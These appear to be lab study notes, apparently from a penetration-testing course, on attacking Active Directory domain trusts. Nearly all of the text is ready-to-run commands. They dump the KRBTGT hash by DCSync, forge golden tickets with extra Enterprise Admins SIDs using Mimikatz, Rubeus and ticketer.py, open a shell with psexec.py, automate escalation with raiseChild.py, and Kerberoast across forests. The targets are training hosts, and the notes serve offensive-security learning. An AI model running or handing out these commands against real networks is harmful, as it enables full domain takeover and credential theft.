Enumerate Domain Trusts (PowerView)
Show Existing Trusts
Show Trust Mapping
Copy Get-DomainTrustMapping Show Users in the Child Domain
Copy Get-DomainUser - Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName Attacking Domain Trusts - Child -> Parent (Windows)
To perform this attack after compromising a child domain, we need the following:
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain.
The SID of the Enterprise Admins group of the root domain.
With this data collected, the attack can be performed with Mimikatz.
1 Obtaining KRBTGT NT Hash
Copy mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt 2 Obtaining SID Child Domain
3 Name Target User
Copy # Can be a fake usernamr 4 FQDN Child Domain
5 SID Enterprise Admins Group
Copy Get-DomainGroup - Domain INLANEFREIGHT.LOCAL - Identity "Enterprise Admins" | select distinguishedname , objectsid 6 Putting It All Together
Copy # Mimikatz Way
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
# Rubeus Way
\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt 7 Confirm Ticket
8 DCsync
Copy # Mimikatz
lsadump::dcsync Attacking Domain Trusts - Child -> Parent (Linux)
We can also perform the attack shown in the previous section from a Linux attack host. To do so, we'll still need to gather the same bits of information:
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain
The SID of the Enterprise Admins group of the root domain
1 Get KRBTGT NT Hash
Copy secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt 2 Get SID Child Domain
Copy lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID" 3 Name Target User
4 Get SID Enterprise Admins
Copy lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins" 5 Putting it all Together
Copy ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker 6 Export ccache
Copy export KRB5CCNAME = hacker.ccache 7 Get Shell
Copy psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5 Automatic Way
Copy raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm Attacking Domain Trust - Cross-Forest (Windows)
Cross-Forest Kerberoasting
Copy # Enumerate Cross Forest Users with SPN
Get-DomainUser - SPN - Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
# Rubeus /Domain flag
.\ Rubeus.exe kerberoast / domain:FREIGHTLOGISTICS.LOCAL / user:mssqlsvc / nowrap Admin Password Reuse & Group Membership
Copy # Check Foreign Groups
Get-DomainForeignGroupMember - Domain FREIGHTLOGISTICS.LOCAL
# Convert SID
Convert-SidToName < SID >
# Login, if we are part of the administrators group
Enter-PSSession - ComputerName ACADEMY - EA - DC03.FREIGHTLOGISTICS.LOCAL - Credential INLANEFREIGHT\administrator SID History Abuse
![[Pasted image 20230428181936.png]]
Attacking Domain Trusts - Cross-Forest Trust Abuse (Linux)
Cross-Forest Kerberosting
Copy # Using -target-domain
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley 